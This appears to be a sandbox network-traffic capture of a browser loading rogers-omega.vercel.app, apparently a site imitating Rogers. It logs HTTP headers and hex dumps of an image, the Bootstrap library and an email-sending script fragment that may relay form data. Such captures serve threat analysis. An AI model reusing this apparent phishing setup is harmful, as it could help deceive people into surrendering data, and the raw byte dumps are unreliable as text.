                                                      2024-09-29 05:50:33 UTC680INData Raw: 2c 61 3d 28 65 2c 74 2c 69 2c 6f 29 3d 3e 7b 63 6f 6e 73 74 20 61 3d 6f 7c 7c 72 2e 5f 75 73 65 72 49 44 3b 73 28 61 2c 65 2c 74 29 3b 63 6f 6e 73 74 20 64 3d 7b 6c 69 62 5f 76 65 72 73 69 6f 6e 3a 22 33 2e 31 32 2e 31 22 2c 75 73 65 72 5f 69 64 3a 61 2c 73 65 72 76 69 63 65 5f 69 64 3a 65 2c 74 65 6d 70 6c 61 74 65 5f 69 64 3a 74 2c 74 65 6d 70 6c 61 74 65 5f 70 61 72 61 6d 73 3a 69 7d 3b 72 65 74 75 72 6e 20 6e 28 22 2f 61 70 69 2f 76 31 2e 30 2f 65 6d 61 69 6c 2f 73 65 6e 64 22 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 64 29 2c 7b 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 7d 29 7d 2c 64 3d 28 65 2c 74 2c 69 2c 6f 29 3d 3e 7b 63 6f 6e 73 74 20 61 3d 6f 7c 7c 72 2e 5f 75 73 65 72 49 44 2c 64
                                                      Data Ascii: ,a=(e,t,i,o)=>{const a=o||r._userID;s(a,e,t);const d={lib_version:"3.12.1",user_id:a,service_id:e,template_id:t,template_params:i};return n("/api/v1.0/email/send",JSON.stringify(d),{"Content-type":"application/json"})},d=(e,t,i,o)=>{const a=o||r._userID,d


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.64973476.76.21.1644434420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:34 UTC621OUTGET /assets/rogers_bgr.jpg HTTP/1.1
                                                      Host: rogers-omega.vercel.app
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://rogers-omega.vercel.app/style.css
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-09-29 05:50:34 UTC504INHTTP/1.1 200 OK
                                                      Accept-Ranges: bytes
                                                      Access-Control-Allow-Origin: *
                                                      Age: 152749
                                                      Cache-Control: public, max-age=0, must-revalidate
                                                      Content-Disposition: inline; filename="rogers_bgr.jpg"
                                                      Content-Length: 177323
                                                      Content-Type: image/jpeg
                                                      Date: Sun, 29 Sep 2024 05:50:34 GMT
                                                      Etag: "c9a3247d3438db85783b90f66cfe90da"
                                                      Server: Vercel
                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                      X-Vercel-Cache: HIT
                                                      X-Vercel-Id: iad1::qhf55-1727589034247-e6832df4c239
                                                      Connection: close
                                                      2024-09-29 05:50:34 UTC2372INData Raw: ff d8 ff db 00 84 00 04 03 03 03 03 03 04 03 03 04 06 04 03 04 06 07 05 04 04 05 07 08 07 07 07 07 07 08 0b 08 09 09 09 09 08 0b 0b 0c 0c 0c 0c 0c 0b 0d 0d 0e 0e 0d 0d 12 12 12 12 12 14 14 14 14 14 14 14 14 14 14 01 05 05 05 08 08 08 10 0b 0b 10 14 0e 0e 0e 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff dd 00 04 00 b4 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff c0 00 11 08 03 c0 05 a0 03 00 11 00 01 11 01 02 11 01 ff c4 00 bd 00 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 10 00 01 03 02 04 03 05 03 08 07 05 05 05 07 02 07 01 00 02 03 04
                                                      Data Ascii: Adobed
                                                      2024-09-29 05:50:34 UTC1051INData Raw: ee ab 34 88 84 8f 9a 2a 54 54 15 1b 7c 51 0b 1f 81 0d 2a bf c6 82 66 28 1b 2f 89 55 39 de 04 10 15 02 2a 9a 45 19 ef 39 0d 1a ef 11 40 bc ac 8a 50 10 2a 01 00 80 40 9a a0 54 08 45 d0 22 01 00 81 2c 81 10 08 04 09 64 02 01 60 09 b0 8a ec 16 51 48 80 40 20 4b 6a 88 08 b2 04 54 08 10 a0 44 02 01 00 81 2c 81 50 1c d0 28 50 4e cd 90 57 93 72 81 18 3b aa ec 44 77 51 0c 72 07 35 5d a9 c3 54 0e 1a 26 80 9a 16 b0 ff 00 d2 5a aa 69 b8 11 b8 55 02 a0 10 22 08 e5 f0 bb d1 58 cd 62 cc a6 92 34 b0 ef d1 da a9 8d 5c 51 b0 80 40 20 10 08 04 02 01 00 80 40 20 64 9e 12 ab 35 8b 51 cd 46 6a f6 1a 7e 60 7a 95 56 2f 22 84 02 01 03 24 f0 94 46 25 46 ee f5 50 53 3b a8 1a 81 0a 04 28 a8 c3 86 62 b2 27 67 25 42 48 81 b6 d1 41 5a 5d ca a2 32 39 a8 1a 3c 48 2d 47 b2 a2 76 a4 44 80
                                                      Data Ascii: 4*TT|Q*f(/U9*E9@P*@TE",d`QH@ KjTD,P(PNWr;DwQr5]T&ZiU"Xb4\Q@ @ d5QFj~`zV/"$F%FPS;(b'g%BHAZ]29<H-GvD
                                                      2024-09-29 05:50:34 UTC4744INData Raw: b6 0d b2 a2 8b de 5d f1 0b 3b 56 85 0d 54 6c 8c 31 e6 c4 2d 0b cd a8 88 eb 98 7d a9 a3 c9 20 91 a7 62 13 47 91 73 26 97 65 b8 43 62 e0 a2 ce c6 8a 1a 08 0b a0 10 08 02 85 22 a8 6b fc 25 19 ac 5a 8e 7e aa 25 5d c3 7e 84 7a 95 56 2f a3 41 00 88 10 35 fb 14 4a c4 a9 dc a8 29 28 1a 81 0a 08 e4 f0 94 be 95 cf d6 c9 27 6e 03 76 ba c0 dd a0 b9 8c 5d 6a 0b 12 6e 81 39 28 2b 4b e2 54 44 54 00 dd 08 b3 1e ca ad 4e d4 8c a4 6a a1 c1 50 f1 b2 07 85 43 c2 07 04 0e 0a a1 c3 64 0a 81 42 05 40 28 a1 00 80 40 20 10 08 04 02 01 02 2a 81 02 14 08 80 40 20 42 10 22 01 01 64 02 04 25 02 20 10 22 8a 10 08 1a 81 0a 04 40 db 20 10 34 ee 82 0a ef d0 aa 7f 74 ff 00 e5 28 3f ff d3 fa df 0e 60 38 7d 26 9f ee 63 fe 40 b4 c2 d0 60 e8 88 5c 81 03 4c 61 14 06 20 52 c4 12 46 dc ad b2 80
                                                      Data Ascii: ];VTl1-} bGs&eCb"k%Z~%]~zV/A5J)('nv]jn9(+KTDTNjPCdB@(@ *@ B"d% "@ 4t(?`8}&c@`\La RF
                                                      2024-09-29 05:50:34 UTC5930INData Raw: 35 03 90 0a c0 b7 56 1b 5a c3 bf 4b 6a a7 db 79 65 b0 80 40 20 10 35 fe 12 ac 4c 98 d5 1c d5 62 2f e1 df a3 35 4a d6 2b 8a 34 10 08 04 02 01 00 80 40 20 10 08 04 08 ed 95 4a c8 a9 f1 1f 55 59 8b 38 67 d0 9f 52 89 3d af ac ba 04 02 01 54 34 ec 8c d6 45 4f 88 a0 ce 77 88 a9 42 28 04 08 55 10 9f 12 cd 54 cc 1a 84 0b 22 21 a3 65 05 79 77 55 50 9e aa 06 8f 12 0b 51 ec 15 16 02 b1 12 05 44 81 03 c2 b0 48 10 38 2a 87 84 0a 10 39 14 28 14 6c 81 50 08 04 02 05 08 10 ee 80 40 20 10 0a ae c2 04 2a 1a 22 20 40 8a a0 40 20 08 40 72 40 d4 02 04 b6 a8 14 a0 6a 00 20 6a 01 02 15 14 20 42 10 21 08 10 ec 81 10 21 41 5a bb f4 2a 9f dd 3f f9 4a 0f ff d5 fb 03 0d ff 00 67 52 7e e2 3f e4 08 8b 28 04 02 01 00 80 40 20 10 08 04 02 01 00 80 40 20 10 08 04 02 01 00 80 40 20 10 21
                                                      Data Ascii: 5VZKjye@ 5Lb/5J+4@ JUY8gR=T4EOwB(UT"!eywUPQDH8*9(lP@ *" @@ @r@j j B!!AZ*?JgR~?(@ @ @ !
                                                      2024-09-29 05:50:34 UTC7116INData Raw: dc 66 1a 6a b1 95 b5 b9 8c 89 1d 3d 37 63 04 0d b3 66 00 99 7b ce 21 fa 93 de 6d c0 b8 bd 96 31 6f 60 57 42 61 ca c7 f6 93 80 19 23 6e 6e 49 24 de e7 7b 5c 68 b3 6b 51 56 9f 1e 96 0a b8 e6 78 31 d4 3a 4e d0 31 8e 20 39 8d 1b 12 d3 cc 68 b5 8d d3 19 4d b7 cf 1e 62 af 86 36 4b 2c 8e a4 6e 58 db 1c 37 6b 7b 3b 17 36 32 05 81 6b 7a f8 8f 55 3c ea f8 47 49 1f b4 16 c2 69 26 6e 79 d9 4d 23 4c d1 87 02 e7 c7 6c a5 99 bc 5b 3b a7 ad d5 fc 95 9b c5 b7 5b 85 f1 e6 1d 59 53 0d 45 44 a2 68 1f 4c f6 c0 5c f0 67 13 6a ec e2 d6 70 0d 24 35 9e 5c 97 6c 79 9c ef 0c 7a 87 08 71 e6 0f 5f 87 45 4a fa a1 ef 6c 04 16 3d f7 7b 5c 09 cd 98 3a c7 71 75 e8 c3 9a 57 9b 2e 1b 1d a5 3e 2b 4b 27 66 fc e5 d1 ef 1c d1 8c cd 21 db f8 41 b0 f5 5d a6 5b 72 b8 e9 6c ba 17 bd a1 d2 59 c4 f7
                                                      Data Ascii: fj=7cf{!m1o`WBa#nnI${\hkQVx1:N1 9hMb6K,nX7k{;62kzU<GIi&nyM#Ll[;[YSEDhL\gjp$5\lyzq_EJl={\:quW.>+K'f!A][rlY
                                                      2024-09-29 05:50:34 UTC8302INData Raw: e6 e3 86 79 47 33 c4 55 3d 84 50 32 17 b6 49 59 e3 96 36 58 12 49 b0 b7 a2 ef 8e 2f 36 55 14 2e ef b6 59 0b bf bb 96 87 96 82 33 3a d7 2d d2 e0 eb e4 a6 5e d2 28 55 b2 a2 bc be 43 10 8d 91 02 e7 69 a8 bb ba 01 d5 5d 96 26 c3 f0 ca ba a6 90 e6 b9 d2 78 5c c0 eb 7c db 45 c8 06 fa 9d 2f 94 2b 6a c8 bb 3f 0f d2 09 45 4c 51 f6 ae 8c 06 39 d5 0f ca 09 b5 ec c6 6b a8 3b 92 56 3c a9 e2 96 5c 30 c6 49 74 6f 31 3d b9 db 20 37 78 3c da eb 9d 42 df 93 36 20 32 be 20 7b 3e fc 24 86 86 92 d2 4e 9b 90 01 b7 92 95 24 55 9e ae 26 46 20 73 f2 91 a3 58 5c 1c 58 dd c3 48 02 df 7a d4 56 0d 55 64 b2 e8 fe eb 39 b5 b6 00 79 8b 2a 87 9e c5 f1 38 3c 16 b8 01 62 d3 a1 16 e9 d5 11 52 29 1b 1f 6a d1 a5 85 da 48 d4 df 4e 6a 9b 32 29 9d 4d 28 95 8f cc c9 3b b2 46 ed 41 d7 65 2c 59 d3
                                                      Data Ascii: yG3U=P2IY6XI/6U.Y3:-^(UCi]&x\|E/+j?ELQ9k;V<\0Ito1= 7x<B6 2 {>$N$U&F sX\XHzVUd9y*8<bR)jHNj2)M(;FAe,Y
                                                      2024-09-29 05:50:34 UTC6676INData Raw: 87 ba 49 22 b8 89 e5 b3 4c f3 9d f2 b4 36 d7 b9 3c af a0 2b 1c 92 d8 df 16 53 c9 f3 df 19 47 1f 7a 41 29 8e 27 0b 89 5c 7c 4e 22 c7 42 34 b8 f8 ac f1 5d 3b 72 cd bc b6 b7 14 c4 a2 63 a8 a3 79 f7 0b 87 ba 26 80 1b cf 29 cb b8 77 45 ec c7 c5 e3 b3 26 70 9d f5 e1 f3 56 66 ee b5 cc 69 e4 4f 53 e4 4d 96 e3 36 30 aa 98 e9 cb dc e1 a6 e4 f3 bd b7 ba eb 8d 71 ca 32 24 25 8d b3 8e fd 3a ae bb 71 b1 35 13 7b 5a 88 61 71 cc c7 bd ad b1 d7 42 57 3e 5f ed ae 9c 33 f7 c7 de 9e cc 30 d8 a9 70 9a 46 86 d8 86 80 47 c2 cb e4 f0 7a db ed fc 99 ab a7 59 89 1c b2 48 e0 2f 63 6d 16 b9 32 73 e3 9b 71 78 ac a5 ce 70 16 d4 2f 36 75 ed c3 17 0f 8a 4b 79 08 69 3a 74 5c eb d3 8c e9 ca d7 38 39 a5 84 6b c8 94 85 60 d5 86 bb 7d 86 f6 e6 ba 4a e5 63 12 ae 16 3c f4 be db 2e f8 e4 f3 e5
                                                      Data Ascii: I"L6<+SGzA)'\|N"B4];rcy&)wE&pVfiOSM60q2$%:q5{ZaqBW>_30pFGzYH/cm2sqxp/6uKyi:t\89k`}Jc<.
                                                      2024-09-29 05:50:34 UTC10674INData Raw: a1 54 fe e9 ff 00 ca 50 7f ff d1 fb 03 0d ff 00 67 52 7e e2 3f e4 08 8b 28 04 02 01 00 80 40 20 86 55 a6 52 b3 56 85 16 15 45 08 04 02 01 00 80 40 20 10 08 04 02 01 00 80 40 20 09 54 a6 15 59 0d 40 e5 17 61 02 85 16 21 9b c2 56 99 66 c9 b9 46 51 a8 a7 43 f4 88 27 3f 4a aa a5 9b c0 50 52 84 f7 ca 1a 5c 66 ad 41 5d 9f 4c 50 3e a3 6b 29 66 c6 75 54 42 56 96 9e 61 73 e6 c2 67 87 8b 36 6d ca 56 d3 18 25 70 b7 77 92 fc 8f ca e0 bc 79 69 ca c5 51 21 69 04 1b 38 2e 1c 77 57 a4 6d 61 98 98 7f cd 48 6c e1 a6 ab f4 9f 07 e5 cc bf b9 bc 72 6d b4 82 2e 0d c2 fa 8e bb 2a 02 e8 1a 80 50 66 63 17 34 cf b7 42 a6 fa 63 97 d3 cf cb 4b 5c 2f d7 55 c3 7d be 6f db a2 c1 de 2c 1b 75 d3 1a f5 fc 7b f4 de 6a db d2 78 3b 29 45 6c 46 41 15 2b dc 4d ac d2 b9 73 e5 ac 5c f9 ae b1 73
                                                      Data Ascii: TPgR~?(@ URVE@ @ TY@a!VfFQC'?JPR\fA]LP>k)fuTBVasg6mV%pwyiQ!i8.wWmaHlrm.*Pfc4BcK\/U}o,u{jx;)ElFA+Ms\s
                                                      2024-09-29 05:50:34 UTC11860INData Raw: c3 b0 c7 09 c8 f9 ca 8a a7 ba 6b 1e 8c 6b bb bf 12 17 ca cb 2a fd 6e 1c 5e 33 ad 3c e2 be 9e aa aa 41 13 4e 48 87 d4 6e de ba 68 a5 e4 72 cf 08 7c 74 4c a7 60 60 b3 9d b9 3e 6b 8d cb 6e 7e 32 27 7b 83 23 b1 eb af 5b ac e8 db 32 68 b3 ea 76 df d5 6d c5 9f 2b 6d d4 79 aa cd 8a 72 be de 57 d9 74 8c d5 71 17 69 70 45 f9 ad 32 5e c6 ce 68 f3 1a 7c 53 69 60 92 17 76 9a 0d 09 3a f4 b2 b2 b3 62 29 a9 b3 8d 3c 36 df 9f 92 d4 ae 77 12 98 f2 86 df 41 60 35 fb d4 da e9 4d ec c8 e2 40 04 bf 4f 20 37 5d b8 a7 dd 7a 38 78 7e ea ab a3 71 b8 36 b6 b7 b2 f4 3d 5f 8d 09 06 59 03 46 80 73 b6 e7 ca e8 e7 31 ed a1 15 76 26 e7 c3 4c 2b 25 7c 4c 71 31 c6 f7 17 34 12 dc a4 80 eb d8 d9 63 3c 66 8b 84 d7 65 c4 b1 09 71 09 59 4b 34 ef 94 c3 a1 6b 89 2d 6d b5 36 e5 f6 2f 3f 87 8c 7c
                                                      Data Ascii: kk*n^3<ANHnhr|tL``>kn~2'{#[2hvm+myrWtqipE2^h|Si`v:b)<6wA`5M@O 7]z8x~q6=_YFs1v&L+%|Lq14c<feqYK4k-m6/?|
                                                      2024-09-29 05:50:34 UTC10234INData Raw: 1a 50 49 e6 ee 4b 3b ed cb ca da bb 49 4a e6 8c d2 9b b8 ad ba cc 75 da ea 28 54 2d d0 04 dd 01 74 0a 0a 05 40 84 a0 54 02 01 02 04 12 35 03 1f b9 40 91 a0 43 b9 41 13 94 0e 69 ba 07 2a 16 e8 1c 81 10 22 b0 2d ec 81 15 0b 7b 20 2e 80 bf 55 04 52 0b b4 ab 13 4c 3a 8c 33 b5 9b b4 70 bd 95 95 9b 89 3e 4b 8f f5 47 d8 9b 35 07 c9 91 83 a3 45 fd 13 66 a1 cc c3 d8 d3 ab 47 d8 9b 59 8c 4b ee 8d b5 b2 fd c9 b3 40 53 34 6b 95 36 58 71 a6 6f ea a2 78 9b ee ed fd 55 4d 24 6c 2d fd 54 24 48 18 cb 6c 8b a2 96 b3 90 44 d1 03 59 fa a8 68 99 19 7d 90 d1 f9 19 71 a2 1a 41 53 18 2d 19 06 b7 51 2a ed 20 22 30 0a 8d 7d 2c a2 95 01 74 05 d0 17 40 5d 02 85 95 05 02 20 44 10 4c eb 11 7d 14 a2 56 11 61 a8 56 09 5c 7b a1 28 8d bb d9 03 25 52 8a e4 e8 a2 91 a7 bc 8a b9 1e c1 69 94
                                                      Data Ascii: PIK;IJu(T-t@T5@CAi*"-{ .URL:3p>KG5EfGYK@S4k6XqoxUM$l-T$HlDYh}qAS-Q* "0},t@] DL}VaV\{(%Ri


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.649733151.101.129.2294434420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:34 UTC612OUTGET /npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js HTTP/1.1
                                                      Host: cdn.jsdelivr.net
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Origin: https://rogers-omega.vercel.app
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://rogers-omega.vercel.app/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-09-29 05:50:34 UTC776INHTTP/1.1 200 OK
                                                      Connection: close
                                                      Content-Length: 80420
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Expose-Headers: *
                                                      Timing-Allow-Origin: *
                                                      Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                                                      Cross-Origin-Resource-Policy: cross-origin
                                                      X-Content-Type-Options: nosniff
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Content-Type: application/javascript; charset=utf-8
                                                      X-JSD-Version: 5.2.3
                                                      X-JSD-Version-Type: version
                                                      ETag: W/"13a24-kNFQNu9I/LM2oTW66BK0VmnxkEQ"
                                                      Accept-Ranges: bytes
                                                      Age: 1522991
                                                      Date: Sun, 29 Sep 2024 05:50:34 GMT
                                                      X-Served-By: cache-fra-etou8220135-FRA, cache-ewr-kewr1740061-EWR
                                                      X-Cache: HIT, HIT
                                                      Vary: Accept-Encoding
                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                      2024-09-29 05:50:34 UTC1378INData Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 32 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 32 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62
                                                      Data Ascii: /*! * Bootstrap v5.2.3 (https://getbootstrap.com/) * Copyright 2011-2022 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */!function(t,e){"ob
                                                      2024-09-29 05:50:34 UTC1378INData Raw: 45 4d 45 4e 54 5f 4e 4f 44 45 7c 7c 21 21 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 28 76 6f 69 64 20 30 21 3d 3d 74 2e 64 69 73 61 62 6c 65 64 3f 74 2e 64 69 73 61 62 6c 65 64 3a 74 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 26 26 22 66 61 6c 73 65 22 21 3d 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 29 2c 63 3d 74 3d 3e 7b 69 66 28 21 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 74 74 61 63 68 53 68 61 64 6f 77 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 52 6f 6f 74 4e 6f 64 65 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 67 65
                                                      Data Ascii: EMENT_NODE||!!t.classList.contains("disabled")||(void 0!==t.disabled?t.disabled:t.hasAttribute("disabled")&&"false"!==t.getAttribute("disabled")),c=t=>{if(!document.documentElement.attachShadow)return null;if("function"==typeof t.getRootNode){const e=t.ge
                                                      2024-09-29 05:50:34 UTC1378INData Raw: 3a 74 5b 30 5d 3a 28 6f 2b 3d 69 3f 31 3a 2d 31 2c 6e 26 26 28 6f 3d 28 6f 2b 73 29 25 73 29 2c 74 5b 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 6f 2c 73 2d 31 29 29 5d 29 7d 2c 76 3d 2f 5b 5e 2e 5d 2a 28 3f 3d 5c 2e 2e 2a 29 5c 2e 7c 2e 2a 2f 2c 79 3d 2f 5c 2e 2e 2a 2f 2c 77 3d 2f 3a 3a 5c 64 2b 24 2f 2c 41 3d 7b 7d 3b 6c 65 74 20 45 3d 31 3b 63 6f 6e 73 74 20 54 3d 7b 6d 6f 75 73 65 65 6e 74 65 72 3a 22 6d 6f 75 73 65 6f 76 65 72 22 2c 6d 6f 75 73 65 6c 65 61 76 65 3a 22 6d 6f 75 73 65 6f 75 74 22 7d 2c 43 3d 6e 65 77 20 53 65 74 28 5b 22 63 6c 69 63 6b 22 2c 22 64 62 6c 63 6c 69 63 6b 22 2c 22 6d 6f 75 73 65 75 70 22 2c 22 6d 6f 75 73 65 64 6f 77 6e 22 2c 22 63 6f 6e 74 65 78 74 6d 65 6e 75 22 2c 22 6d 6f 75 73 65 77 68 65 65 6c 22 2c
                                                      Data Ascii: :t[0]:(o+=i?1:-1,n&&(o=(o+s)%s),t[Math.max(0,Math.min(o,s-1))])},v=/[^.]*(?=\..*)\.|.*/,y=/\..*/,w=/::\d+$/,A={};let E=1;const T={mouseenter:"mouseover",mouseleave:"mouseout"},C=new Set(["click","dblclick","mouseup","mousedown","contextmenu","mousewheel",
                                                      2024-09-29 05:50:34 UTC1378INData Raw: 3b 63 6f 6e 73 74 20 64 3d 4f 28 72 2c 65 2e 72 65 70 6c 61 63 65 28 76 2c 22 22 29 29 2c 75 3d 6f 3f 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 6e 28 73 29 7b 63 6f 6e 73 74 20 6f 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3b 66 6f 72 28 6c 65 74 7b 74 61 72 67 65 74 3a 72 7d 3d 73 3b 72 26 26 72 21 3d 3d 74 68 69 73 3b 72 3d 72 2e 70 61 72 65 6e 74 4e 6f 64 65 29 66 6f 72 28 63 6f 6e 73 74 20 61 20 6f 66 20 6f 29 69 66 28 61 3d 3d 3d 72 29 72 65 74 75 72 6e 20 6a 28 73 2c 7b 64 65 6c 65 67 61 74 65 54 61 72 67 65 74 3a 72 7d 29 2c 6e 2e 6f 6e 65 4f 66 66 26 26 50 2e 6f 66 66 28 74 2c 73 2e 74 79 70 65 2c 65 2c 69 29 2c 69 2e 61 70 70 6c 79 28 72 2c 5b 73 5d 29 7d 7d 28 74 2c 69
                                                      Data Ascii: ;const d=O(r,e.replace(v,"")),u=o?function(t,e,i){return function n(s){const o=t.querySelectorAll(e);for(let{target:r}=s;r&&r!==this;r=r.parentNode)for(const a of o)if(a===r)return j(s,{delegateTarget:r}),n.oneOff&&P.off(t,s.type,e,i),i.apply(r,[s])}}(t,i
                                                      2024-09-29 05:50:34 UTC1378INData Raw: 21 73 2e 69 73 49 6d 6d 65 64 69 61 74 65 50 72 6f 70 61 67 61 74 69 6f 6e 53 74 6f 70 70 65 64 28 29 2c 61 3d 73 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 29 3b 6c 65 74 20 6c 3d 6e 65 77 20 45 76 65 6e 74 28 65 2c 7b 62 75 62 62 6c 65 73 3a 6f 2c 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3b 72 65 74 75 72 6e 20 6c 3d 6a 28 6c 2c 69 29 2c 61 26 26 6c 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 72 26 26 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6c 29 2c 6c 2e 64 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 26 26 73 26 26 73 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 6c 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 6a 28 74 2c 65 29 7b 66 6f 72 28 63 6f 6e 73 74 5b 69 2c 6e 5d 6f 66 20 4f 62 6a 65 63 74 2e 65 6e 74
                                                      Data Ascii: !s.isImmediatePropagationStopped(),a=s.isDefaultPrevented());let l=new Event(e,{bubbles:o,cancelable:!0});return l=j(l,i),a&&l.preventDefault(),r&&t.dispatchEvent(l),l.defaultPrevented&&s&&s.preventDefault(),l}};function j(t,e){for(const[i,n]of Object.ent
                                                      2024-09-29 05:50:34 UTC1378INData Raw: 61 74 61 73 65 74 5b 6e 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 67 65 74 44 61 74 61 41 74 74 72 69 62 75 74 65 3a 28 74 2c 65 29 3d 3e 24 28 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 60 64 61 74 61 2d 62 73 2d 24 7b 57 28 65 29 7d 60 29 29 7d 3b 63 6c 61 73 73 20 46 7b 73 74 61 74 69 63 20 67 65 74 20 44 65 66 61 75 6c 74 28 29 7b 72 65 74 75 72 6e 7b 7d 7d 73 74 61 74 69 63 20 67 65 74 20 44 65 66 61 75 6c 74 54 79 70 65 28 29 7b 72 65 74 75 72 6e 7b 7d 7d 73 74 61 74 69 63 20 67 65 74 20 4e 41 4d 45 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 59 6f 75 20 68 61 76 65 20 74 6f 20 69 6d 70 6c 65 6d 65 6e 74 20 74 68 65 20 73 74 61 74 69 63 20 6d 65 74 68 6f 64 20 22 4e 41 4d 45 22 2c 20 66 6f 72 20 65 61 63 68 20 63 6f 6d 70 6f 6e 65 6e
                                                      Data Ascii: ataset[n])}return e},getDataAttribute:(t,e)=>$(t.getAttribute(`data-bs-${W(e)}`))};class F{static get Default(){return{}}static get DefaultType(){return{}}static get NAME(){throw new Error('You have to implement the static method "NAME", for each componen
